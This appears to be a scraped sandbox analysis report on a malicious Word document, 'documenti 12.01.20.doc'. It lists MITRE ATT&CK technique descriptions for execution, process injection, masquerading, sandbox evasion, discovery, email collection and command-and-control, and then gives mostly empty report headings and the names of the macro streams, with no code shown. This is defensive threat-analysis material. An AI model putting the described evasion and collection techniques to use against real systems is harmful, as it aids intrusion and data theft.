Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system. Functionality could exist within remote access tools to enable this, but utilities available on the operating system could also be used such as Ping or `net view` using Net . Adversaries may also use local host files (ex: `C:\Windows\System32\Drivers\etc\hosts` or `/etc/hosts` ) in order to discover the hostname to IP address mappings of remote systems.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report documenti 12.01.20.doc

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Yara Overview

Sigma Overview

Signature Overview

AV Detection:

Software Vulnerabilities:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

System Summary:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static OLE Info

General

OLE File "/opt/package/joesandbox/database/analysis/326338/sample/documenti 12.01.20.doc"

Indicators

Summary

Document Summary

Streams with VBA

VBA File Name: ThisDocument.cls, Stream Size: 1127

General

VBA Code Keywords

VBA Code

VBA File Name: a7A5m.bas, Stream Size: 5178

General

VBA Code Keywords

VBA Code

VBA File Name: aH8xms.bas, Stream Size: 863

General

VBA Code Keywords

VBA Code

VBA File Name: aIsb7.bas, Stream Size: 5040

General